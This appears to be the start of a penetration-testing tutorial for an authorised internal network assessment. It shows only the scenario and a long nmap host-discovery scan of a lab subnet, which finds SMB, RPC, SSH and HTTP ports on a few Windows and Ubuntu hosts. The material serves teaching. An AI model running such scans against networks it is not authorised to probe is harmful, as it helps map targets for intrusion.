Internal Network Penetration Testing: From Getting Started to Getting Jailed

Scenario:

A client asks you to perform a security assessment of their internal network. You take the job and pin down the client's requirements: no impact on business operations, no restriction on attack techniques, and the goal is to obtain privileges on the servers. They give you one IP range: 10.211.55.1/24

Penetration Testing Workflow


Information Gathering

First, configure the network of your penetration testing environment.

Discovering Live Hosts

Nmap

```text
(base) ➜ ~ Nmap -Pn 10.211.55.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CST
Nmap scan report for 10.211.55.0
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.0 are filtered
Nmap scan report for 10.211.55.1
Host is up.
All 1000 scanned ports on 10.211.55.1 are filtered
Nmap scan report for 10.211.55.2
Host is up (0.0013s latency).
All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for 10.211.55.3
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.3 are filtered
Nmap scan report for 10.211.55.4
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.4 are filtered
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00068s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00085s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
Nmap scan report for 10.211.55.7
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.7 are filtered
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.0011s latency).
Not shown: 991 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
Nmap scan report for 10.211.55.9
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.9 are filtered
Nmap scan report for 10.211.55.10
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.10 are filtered
Nmap scan report for 10.211.55.11
Host is up (0.000026s latency).
All 1000 scanned ports on 10.211.55.11 are filtered
Nmap scan report for 10.211.55.12
Host is up (0.000029s latency).
All 1000 scanned ports on 10.211.55.12 are filtered
Nmap scan report for 10.211.55.13
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.13 are filtered
Nmap scan report for 10.211.55.14
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.14 are filtered
Nmap scan report for 10.211.55.15
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.15 are filtered
Nmap scan report for 10.211.55.16
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.16 are filtered
Nmap scan report for 10.211.55.17
Host is up (0.000027s latency).
All 1000 scanned ports on 10.211.55.17 are filtered
Nmap scan report for 10.211.55.18
Host is up (0.000027s latency).
All 1000 scanned ports on 10.211.55.18 are filtered
Nmap scan report for 10.211.55.19
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.19 are filtered
Nmap scan report for 10.211.55.20
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.20 are filtered
Nmap scan report for 10.211.55.21
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.21 are filtered
Nmap scan report for 10.211.55.22
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.22 are filtered
Nmap scan report for 10.211.55.23
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.23 are filtered
Nmap scan report for 10.211.55.24
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.24 are filtered
Nmap scan report for 10.211.55.25
Host is up (0.000019s latency).
All 1000 scanned ports on 10.211.55.25 are filtered
Nmap scan report for 10.211.55.26
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.26 are filtered
Nmap scan report for 10.211.55.27
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.27 are filtered
Nmap scan report for 10.211.55.28
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.28 are filtered
Nmap scan report for 10.211.55.29
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.29 are filtered
Nmap scan report for 10.211.55.30
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.30 are filtered
Nmap scan report for 10.211.55.31
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.31 are filtered
Nmap scan report for 10.211.55.32
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.32 are filtered
Nmap scan report for 10.211.55.33
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.33 are filtered
Nmap scan report for 10.211.55.34
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.34 are filtered
Nmap scan report for 10.211.55.35
Host is up (0.000019s latency).
All 1000 scanned ports on 10.211.55.35 are filtered
Nmap scan report for 10.211.55.36
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.36 are filtered
Nmap scan report for 10.211.55.37
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.37 are filtered
Nmap scan report for 10.211.55.38
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.38 are filtered
Nmap scan report for 10.211.55.39
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.39 are filtered
Nmap scan report for 10.211.55.40
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.40 are filtered
Nmap scan report for 10.211.55.41
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.41 are filtered
Nmap scan report for 10.211.55.42
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.42 are filtered
Nmap scan report for 10.211.55.43
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.43 are filtered
Nmap scan report for 10.211.55.44
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.44 are filtered
Nmap scan report for 10.211.55.45
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.45 are filtered
Nmap scan report for 10.211.55.46
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.46 are filtered
Nmap scan report for 10.211.55.47
Host is up (0.000035s latency).
All 1000 scanned ports on 10.211.55.47 are filtered
Nmap scan report for 10.211.55.48
Host is up (0.000029s latency).
All 1000 scanned ports on 10.211.55.48 are filtered
Nmap scan report for 10.211.55.49
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.49 are filtered
Nmap scan report for 10.211.55.50
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.50 are filtered
Nmap scan report for 10.211.55.51
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.51 are filtered
Nmap scan report for 10.211.55.52
Host is up (0.000016s latency).
All 1000 scanned ports on 10.211.55.52 are filtered
Nmap scan report for 10.211.55.53
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.53 are filtered
Nmap scan report for 10.211.55.54
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.54 are filtered
Nmap scan report for 10.211.55.55
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.55 are filtered
Nmap scan report for 10.211.55.56
Host is up (0.000017s latency).
All 1000 scanned ports on 10.211.55.56 are filtered
Nmap scan report for 10.211.55.57
Host is up (0.000028s latency).
All 1000 scanned ports on 10.211.55.57 are filtered
Nmap scan report for 10.211.55.58
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.58 are filtered
Nmap scan report for 10.211.55.59
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.59 are filtered
Nmap scan report for 10.211.55.60
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.60 are filtered
Nmap scan report for 10.211.55.61
Host is up (0.000035s latency).
All 1000 scanned ports on 10.211.55.61 are filtered
Nmap scan report for 10.211.55.62
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.62 are filtered
Nmap scan report for 10.211.55.63
Host is up (0.000026s latency).
All 1000 scanned ports on 10.211.55.63 are filtered
Nmap scan report for 10.211.55.64
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.64 are filtered
Nmap scan report for 10.211.55.65
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.65 are filtered
Nmap scan report for 10.211.55.66
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.66 are filtered
Nmap scan report for 10.211.55.67
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.67 are filtered
Nmap scan report for 10.211.55.68
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.68 are filtered
Nmap scan report for 10.211.55.69
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.69 are filtered
Nmap scan report for 10.211.55.70
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.70 are filtered
Nmap scan report for 10.211.55.71
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.71 are filtered
Nmap scan report for 10.211.55.72
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.72 are filtered
Nmap scan report for 10.211.55.73
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.73 are filtered
Nmap scan report for 10.211.55.74
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.74 are filtered
Nmap scan report for 10.211.55.75
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.75 are filtered
Nmap scan report for 10.211.55.76
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.76 are filtered
Nmap scan report for 10.211.55.77
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.77 are filtered
Nmap scan report for 10.211.55.78
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.78 are filtered
Nmap scan report for 10.211.55.79
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.79 are filtered
Nmap scan report for 10.211.55.80
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.80 are filtered
Nmap scan report for 10.211.55.81
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.81 are filtered
Nmap scan report for 10.211.55.82
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.82 are filtered
Nmap scan report for 10.211.55.83
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.83 are filtered
Nmap scan report for 10.211.55.84
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.84 are filtered
Nmap scan report for 10.211.55.85
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.85 are filtered
Nmap scan report for 10.211.55.86
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.86 are filtered
Nmap scan report for 10.211.55.87
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.87 are filtered
Nmap scan report for 10.211.55.88
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.88 are filtered
Nmap scan report for 10.211.55.89
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.89 are filtered
Nmap scan report for 10.211.55.90
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.90 are filtered
Nmap scan report for 10.211.55.91
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.91 are filtered
Nmap scan report for 10.211.55.92
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.92 are filtered
Nmap scan report for 10.211.55.93
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.93 are filtered
Nmap scan report for 10.211.55.94
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.94 are filtered
Nmap scan report for 10.211.55.95
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.95 are filtered
Nmap scan report for 10.211.55.96
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.96 are filtered
Nmap scan report for 10.211.55.97
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.97 are filtered
Nmap scan report for 10.211.55.98
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.98 are filtered
Nmap scan report for 10.211.55.99
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.99 are filtered
Nmap scan report for 10.211.55.100
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.100 are filtered
Nmap scan report for 10.211.55.101
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.101 are filtered
Nmap scan report for 10.211.55.102
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.102 are filtered
Nmap scan report for 10.211.55.103
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.103 are filtered
Nmap scan report for 10.211.55.104
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.104 are filtered
Nmap scan report for 10.211.55.105
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.105 are filtered
Nmap scan report for 10.211.55.106
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.106 are filtered
Nmap scan report for 10.211.55.107
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.107 are filtered
Nmap scan report for 10.211.55.108
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.108 are filtered
Nmap scan report for 10.211.55.109
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.109 are filtered
Nmap scan report for 10.211.55.110
Host is up (0.000026s latency).
All 1000 scanned ports on 10.211.55.110 are filtered
Nmap scan report for 10.211.55.111
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.111 are filtered
Nmap scan report for 10.211.55.112
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.112 are filtered
Nmap scan report for 10.211.55.113
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.113 are filtered
Nmap scan report for 10.211.55.114
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.114 are filtered
Nmap scan report for 10.211.55.115
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.115 are filtered
Nmap scan report for 10.211.55.116
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.116 are filtered
Nmap scan report for 10.211.55.117
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.117 are filtered
Nmap scan report for 10.211.55.118
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.118 are filtered
Nmap scan report for 10.211.55.119
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.119 are filtered
Nmap scan report for 10.211.55.120
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.120 are filtered
Nmap scan report for 10.211.55.121
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.121 are filtered
Nmap scan report for 10.211.55.122
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.122 are filtered
Nmap scan report for 10.211.55.123
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.123 are filtered
Nmap scan report for 10.211.55.124
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.124 are filtered
Nmap scan report for 10.211.55.125
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.125 are filtered
Nmap scan report for 10.211.55.126
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.126 are filtered
Nmap scan report for 10.211.55.127
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.127 are filtered
Nmap scan report for 10.211.55.128
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.128 are filtered
Nmap scan report for 10.211.55.129
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.129 are filtered
Nmap scan report for 10.211.55.130
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.130 are filtered
Nmap scan report for 10.211.55.131
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.131 are filtered
Nmap scan report for 10.211.55.132
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.132 are filtered
Nmap scan report for 10.211.55.133
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.133 are filtered
Nmap scan report for 10.211.55.134
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.134 are filtered
Nmap scan report for 10.211.55.135
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.135 are filtered
Nmap scan report for 10.211.55.136
Host is up (0.000027s latency).
All 1000 scanned ports on 10.211.55.136 are filtered
Nmap scan report for 10.211.55.137
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.137 are filtered
Nmap scan report for 10.211.55.138
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.138 are filtered
Nmap scan report for 10.211.55.139
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.139 are filtered
Nmap scan report for 10.211.55.140
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.140 are filtered
Nmap scan report for 10.211.55.141
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.141 are filtered
Nmap scan report for 10.211.55.142
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.142 are filtered
Nmap scan report for 10.211.55.143
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.143 are filtered
Nmap scan report for 10.211.55.144
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.144 are filtered
Nmap scan report for 10.211.55.145
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.145 are filtered
Nmap scan report for 10.211.55.146
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.146 are filtered
Nmap scan report for 10.211.55.147
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.147 are filtered
Nmap scan report for 10.211.55.148
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.148 are filtered
Nmap scan report for 10.211.55.149
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.149 are filtered
Nmap scan report for 10.211.55.150
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.150 are filtered
Nmap scan report for 10.211.55.151
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.151 are filtered
Nmap scan report for 10.211.55.152
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.152 are filtered
Nmap scan report for 10.211.55.153
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.153 are filtered
Nmap scan report for 10.211.55.154
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.154 are filtered
Nmap scan report for 10.211.55.155
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.155 are filtered
Nmap scan report for 10.211.55.156
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.156 are filtered
Nmap scan report for 10.211.55.157
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.157 are filtered
Nmap scan report for 10.211.55.158
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.158 are filtered
Nmap scan report for 10.211.55.159
Host is up (0.000029s latency).
All 1000 scanned ports on 10.211.55.159 are filtered
Nmap scan report for 10.211.55.160
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.160 are filtered
Nmap scan report for 10.211.55.161
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.161 are filtered
Nmap scan report for 10.211.55.162
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.162 are filtered
Nmap scan report for 10.211.55.163
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.163 are filtered
Nmap scan report for 10.211.55.164
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.164 are filtered
Nmap scan report for 10.211.55.165
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.165 are filtered
Nmap scan report for 10.211.55.166
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.166 are filtered
Nmap scan report for 10.211.55.167
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.167 are filtered
Nmap scan report for 10.211.55.168
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.168 are filtered
Nmap scan report for 10.211.55.169
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.169 are filtered
Nmap scan report for 10.211.55.170
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.170 are filtered
Nmap scan report for 10.211.55.171
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.171 are filtered
Nmap scan report for 10.211.55.172
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.172 are filtered
Nmap scan report for 10.211.55.173
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.173 are filtered
Nmap scan report for 10.211.55.174
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.174 are filtered
Nmap scan report for 10.211.55.175
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.175 are filtered
Nmap scan report for 10.211.55.176
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.176 are filtered
Nmap scan report for 10.211.55.177
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.177 are filtered
Nmap scan report for 10.211.55.178
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.178 are filtered
Nmap scan report for 10.211.55.179
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.179 are filtered
Nmap scan report for 10.211.55.180
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.180 are filtered
Nmap scan report for 10.211.55.181
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.181 are filtered
Nmap scan report for 10.211.55.182
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.182 are filtered
Nmap scan report for 10.211.55.183
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.183 are filtered
Nmap scan report for 10.211.55.184
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.184 are filtered
Nmap scan report for 10.211.55.185
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.185 are filtered
Nmap scan report for 10.211.55.186
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.186 are filtered
Nmap scan report for 10.211.55.187
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.187 are filtered
Nmap scan report for 10.211.55.188
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.188 are filtered
Nmap scan report for 10.211.55.189
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.189 are filtered
Nmap scan report for 10.211.55.190
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.190 are filtered
Nmap scan report for 10.211.55.191
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.191 are filtered
Nmap scan report for 10.211.55.192
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.192 are filtered
Nmap scan report for 10.211.55.193
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.193 are filtered
Nmap scan report for 10.211.55.194
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.194 are filtered
Nmap scan report for 10.211.55.195
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.195 are filtered
Nmap scan report for 10.211.55.196
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.196 are filtered
Nmap scan report for 10.211.55.197
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.197 are filtered
Nmap scan report for 10.211.55.198
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.198 are filtered
Nmap scan report for 10.211.55.199
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.199 are filtered
Nmap scan report for 10.211.55.200
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.200 are filtered
Nmap scan report for 10.211.55.201
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.201 are filtered
Nmap scan report for 10.211.55.202
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.202 are filtered
Nmap scan report for 10.211.55.203
Host is up (0.00063s latency).
All 1000 scanned ports on 10.211.55.203 are filtered
Nmap scan report for 10.211.55.204
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.204 are filtered
Nmap scan report for 10.211.55.205
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.205 are filtered
Nmap scan report for 10.211.55.206
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.206 are filtered
Nmap scan report for 10.211.55.207
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.207 are filtered
Nmap scan report for 10.211.55.208
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.208 are filtered
Nmap scan report for 10.211.55.209
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.209 are filtered
Nmap scan report for 10.211.55.210
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.210 are filtered
Nmap scan report for 10.211.55.211
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.211 are filtered
Nmap scan report for 10.211.55.212
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.212 are filtered
Nmap scan report for 10.211.55.213
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.213 are filtered
Nmap scan report for 10.211.55.214
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.214 are filtered
Nmap scan report for 10.211.55.215
Host is up (0.000026s latency).
All 1000 scanned ports on 10.211.55.215 are filtered
Nmap scan report for 10.211.55.216
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.216 are filtered
Nmap scan report for 10.211.55.217
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.217 are filtered
Nmap scan report for 10.211.55.218
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.218 are filtered
Nmap scan report for 10.211.55.219
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.219 are filtered
Nmap scan report for 10.211.55.220
Host is up (0.000024s latency).
All 1000 scanned ports on 10.211.55.220 are filtered
Nmap scan report for 10.211.55.221
Host is up (0.000027s latency).
All 1000 scanned ports on 10.211.55.221 are filtered
Nmap scan report for 10.211.55.222
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.222 are filtered
Nmap scan report for 10.211.55.223
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.223 are filtered
Nmap scan report for 10.211.55.224
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.224 are filtered
Nmap scan report for 10.211.55.225
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.225 are filtered
Nmap scan report for 10.211.55.226
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.226 are filtered
Nmap scan report for 10.211.55.227
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.227 are filtered
Nmap scan report for 10.211.55.228
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.228 are filtered
Nmap scan report for 10.211.55.229
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.229 are filtered
Nmap scan report for 10.211.55.230
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.230 are filtered
Nmap scan report for 10.211.55.231
Host is up (0.000028s latency).
All 1000 scanned ports on 10.211.55.231 are filtered
Nmap scan report for 10.211.55.232
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.232 are filtered
Nmap scan report for 10.211.55.233
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.233 are filtered
Nmap scan report for 10.211.55.234
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.234 are filtered
Nmap scan report for 10.211.55.235
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.235 are filtered
Nmap scan report for 10.211.55.236
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.236 are filtered
Nmap scan report for 10.211.55.237
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.237 are filtered
Nmap scan report for 10.211.55.238
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.238 are filtered
Nmap scan report for 10.211.55.239
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.239 are filtered
Nmap scan report for 10.211.55.240
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.240 are filtered
Nmap scan report for 10.211.55.241
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.241 are filtered
Nmap scan report for 10.211.55.242
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.242 are filtered
Nmap scan report for 10.211.55.243
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.243 are filtered
Nmap scan report for 10.211.55.244
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.244 are filtered
Nmap scan report for 10.211.55.245
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.245 are filtered
Nmap scan report for 10.211.55.246
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.246 are filtered
Nmap scan report for 10.211.55.247
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.247 are filtered
Nmap scan report for 10.211.55.248
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.248 are filtered
Nmap scan report for 10.211.55.249
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.249 are filtered
Nmap scan report for 10.211.55.250
Host is up (0.000027s latency).
All 1000 scanned ports on 10.211.55.250 are filtered
Nmap scan report for 10.211.55.251
Host is up (0.000032s latency).
All 1000 scanned ports on 10.211.55.251 are filtered
Nmap scan report for 10.211.55.252
Host is up (0.000023s latency).
All 1000 scanned ports on 10.211.55.252 are filtered
Nmap scan report for 10.211.55.253
Host is up (0.000021s latency).
All 1000 scanned ports on 10.211.55.253 are filtered
Nmap scan report for 10.211.55.254
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.254 are filtered
Nmap scan report for 10.211.55.255
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.255 are filtered
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds
(base) ➜ ~
```
